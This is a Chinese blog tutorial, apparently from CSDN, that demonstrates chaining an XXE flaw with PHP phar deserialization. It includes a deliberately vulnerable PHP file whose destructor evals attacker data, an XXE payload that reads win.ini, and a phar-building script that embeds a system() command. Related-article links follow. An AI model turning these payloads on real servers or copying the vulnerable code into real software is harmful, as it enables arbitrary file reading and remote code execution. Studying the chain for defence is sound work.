【Web安全】从xxe到phar反序列化

最新推荐文章于 2023-07-06 10:06:00 发布
最新推荐文章于 2023-07-06 10:06:00 发布
阅读量349 收藏
点赞数
分类专栏: 程序员 网络 安全 文章标签: php 网络安全 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HBohan/article/details/120722771
版权
安全 同时被 3 个专栏收录
361 篇文章 43 订阅
订阅专栏
网络
341 篇文章 28 订阅
订阅专栏
程序员
127 篇文章 15 订阅
订阅专栏

在这里插入图片描述

**重要:**在 PHP 里面解析 xml 用的是 libxml,当 libxml 的版本大于 2.9.0 的时候默认是禁止解析 xml 外部实体内容的。

以下代码存在 xxe 漏洞。
xml.php:

<?php
class Test{
    public $cmd;
    public function __destruct()
    {
        eval($this->cmd);
    }
}
$xmlfile = @file_get_contents("php://input");
$result = @simplexml_load_string($xmlfile);
echo $result;

// 另一种解析 xml 的方式
// class Test{
//     public $cmd;
//     public function __destruct()
//     {
//         eval($this->cmd);
//     }
// }

// $file = file_get_contents("php://input");
// $dom = new DOMDocument();
// $dom->loadXML($file);
// $result = simplexml_import_dom($dom);
// echo $result;

触发 xxe 漏洞实现任意文件读取。

<?xml version="1.0"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini" >]>
<foo>&xxe;</foo>

在这里插入图片描述
在 xml 中有一个 Test 类,如果能反序列化该类的话就可以构造恶意代码执行。
支持解析 xml 外部实体的协议如下,可以看到 PHP 支持 phar 协议。也就是说只要有一个文件上传点,并且文件上传的路径是有回显的,那么就可以配合 xxe 漏洞去触发反序列化漏洞。
在这里插入图片描述
通过 xee 触发反序列化漏洞进行任意代码执行。
第一步:先构造 Test 类的 phar 文件,假设生成的 phar 文件已经被上传到 xml.php 的同一个目录。

<?php
class Test{
    public function __construct(){
        $this->cmd = 'system(whoami);';
    }
}

@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new Test();
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

第二步:利用 xxe 漏洞使用 phar 协议解析 phar 文件成功执行命令。
在这里插入图片描述
最后

关注私我获取【网络安全学习资料·攻略
在这里插入图片描述

IT老涵
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP代码审计之XXE(XML外部实体注入)
qq_22132931的博客
12-08 638
PHP代码审计之XXE(XML外部实体注入)
第十届极客大挑战——复现未解决的web和RE
A_dmin的博客
12-06 1183
第十届极客大挑战——复现未解决的web和RE 第十届极客大挑战——复现未解决的web和RE web - 性感黄阿姨,在线聊天 web - Eval evil code web - 服务端检测系统 web - 你有特洛伊么 web - 你读懂潇文清的网站了吗 RE - 阅兵你认真看了嘛? RE - python1
2019红帽杯Ticket_System
weixin_44329796的博客
11-11 598
2019红帽杯Ticket_System菜是原罪读取源码thinkphp5.2+xxe进行RCE上传phar 菜是原罪 祭奠下这道做了一天一夜,最后一点一点做出来的web题。 进入题目是一个登陆界面,查看源码发现 <!-- hint in /hints.txt --> <!-- Not the web root directory. In the ystem root dire...
php(phar)反序列化漏洞及各种绕过姿势
MrWangisgoodboy的博客
04-14 4966
概念:序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。简单来说就是我在一个地方构造了一个类,但我要在另一个地方去使用它,那怎么传过去呢?于是就想到了序列化这种东西,将对象先序列化为一个字符串(数据),后续需要使用的时候再进行反序列化即可得到要使用的对象,十分方便。来看看怎么说:所有php里面的值都可以使用函数来返回一个包含字节流的字符串来表示。函数能够重新把字符串变回php原来的值。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。
XXE反序列化漏洞简述
ZY95001的博客
09-19 1316
一、 二、 三、 四、 五、
WEB安全XXE实体注入漏洞.pdf
12-12
XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储...总之,理解和防范XXE漏洞对于维护Web应用的安全至关重要。开发人员应确保正确处理XML输入,限制XML解析器的功能,并时刻关注最新的安全最佳实践。
信息安全_xxe注入应用与拓展.pptx
08-14
3. **开发框架的Content-Type智能识别**:例如SpringMVC框架,当接收到XML内容并使用JAXB进行反序列化时,如果没有正确的安全设置,可能会导致XXE漏洞。 4. **使用SAML的登录接口**:SAML协议用于身份验证和授权数据...
第85天:CTF夺旗-JAVA考点反编译&XXE&反序列化1
08-03
网络安全领域,尤其是CTF(Capture The Flag)竞赛中,Java技术经常成为关键考点,涉及到的知识点包括但不限于反编译、XXE(XML External Entity)攻击、反序列化漏洞以及文件安全。这些知识点是黑客攻防战中的...
Web安全从入门到放弃.pdf
01-02
这份名为"Web安全从入门到放弃.pdf"的文档可能是由CplusHua,一位36W白帽大佬和青藤云安全分析师编写的,旨在介绍Web安全的基础知识以及一些常见的攻击类型。以下是基于提供的部分内容详细解释的一些关键知识点: 1...
WEB安全知识总结.zip
12-27
采用安全反序列化库和限制反序列化对象的类是有效的防护手段。 学习以上Web安全知识,并结合实际案例进行实践,可以帮助我们更好地理解和应对Web应用中的安全威胁。同时,定期更新和修补系统,遵循安全开发最佳...
XXE超详细讲解(都是纯纯的干货)
最新发布
weixin_63688999的博客
07-06 963
XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础。XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。语法引用的外部实体,而非内部实体,那么uri中能写那些类型的外部实体呢?
利用phar协议造成php反序列化
winterBaba的博客
06-14 583
0x00前言 在php中反序列漏洞,形成的原因首先需要一个unserialize()函数来处理我们传入的可控的序列化payload。但是如果对unserialize()传入的内容进行限制,甚至就不存在可利用的unserialize()函数的时候,就可以借助phar协议触发反序列化操作了 0x01 构造有反序列化payload的phar文件 首先,phar是一种php语言的文件的后缀,所以生成phar文件要用到php语言,需要在php.ini中开启相应的配置 phar.readonly = Off 生成pha
XXE/RCE/序列化反序列化
hk41666的博客
07-17 1598
这几个学得都有点蒙,学得不是很认真,学不下去感觉。不知道学了些什么,也可能是自己身体原因。挺痛苦的。
libxml2的参考手册
blog of eulota
11-24 4051
http://xmlsoft.org/html/index.html 目录表     DOCBparser:旧的DocBook SGML解析器     HTMLparser:一个HTML 4.0非验证解析器接口     HTMLtree:特定的API来处理HTML树,特别是序列化     SAX:旧的SAX版本1处理程序,已过时     SAX2:SAX2解析器接口用于构建DOM树
XXE漏洞利用技巧(XML注入):从XML到远程代码执行
墨痕诉清风的博客
10-12 4838
如今的 web 时代,是一个前后端分离的时代,有人说 MVC 就是前后端分离,但我觉得这种分离的并不彻底,后端还是要尝试去调用渲染类去控制前端的渲染,我所说的前后端分离是,后端 api 只负责接受约定好要传入的数据,然后经过一系列的黑盒运算,将得到结果以 json 格式返回给前端,前端只负责坐享其成,拿到数据json.decode 就行了(这里的后端可以是后台代码,也可以是外部的api 接口,这里的前端可以是传统意义的前端,也可以是后台代码)我们以存在 XXE 漏洞的服务器为我们探测内网的支点。...
phar反序列化漏洞
Mi1k7ea
01-01 5946
之前做CTF遇到phar反序列化漏洞概念,这里小结一下,主要参考自https://paper.seebug.org/680/ 基本概念 phar (PHP Archive) 是PHP里类似于Java中jar的一种打包文件,用于归档。当PHP 版本&gt;=5.3时默认开启支持PHAR文件的。 phar文件默认状态是只读,使用phar文件不需要任何的配置。 而phar://伪协议即PHP归档...
XXE漏洞详解
weixin_56714714的博客
07-25 7775
XXE 什么是XXE? ​ XXE全程xml外部实体,从安全角度来讲,由此引发的漏洞称之为XML外部实体攻击 XML作为一种使用较为广泛的数据传输格式,很多应用程序都包含有处理xml数据的代码, 许多过时或配置不当的XML处理器都会对外部实体进行引用,如果攻击者可以上传XML文档或者在XML文档 中添恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器,XXE漏洞的出现和开发语言无关 只要是应用程序中对XML数据做了解析,而且这些数据又受用户控制,那么应用程序都可能受到XXE攻击 什么是XML?
网络安全入门到精通(总结篇) 最终篇(下)
划水的小白白
04-23 1067
每日一句: 仰望星空的时候,不要忘记脚踏实地 本文内容: 1. web通信基础 2. 后端数据库正则 3. 信息收集 4. sql注入 5. XSS 6. CSRF 7. 文件上传 8. 验证码、密码找回漏洞 9. 越权漏洞 10. SSRF 11. 支付漏洞 12. XXE 13. 变量覆盖 14. 文件包含漏洞 15. 序列化 16. Bypass绕过[S...
利用phar实行php反序列化命令执行(测试环境复现)
weixin_30362233的博客
08-31 320
测试环境的过程大概是:构成出来的phar文件,并修改为任意后缀上传至服务器。通过index.php中存在的文件操作函数参数可控,把参数设置为 phar://上传文件名 即可导致命令执行。 index.php代码如下 <?php class foo { var $ha = 'echo "ok";'; function __destruct() { ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值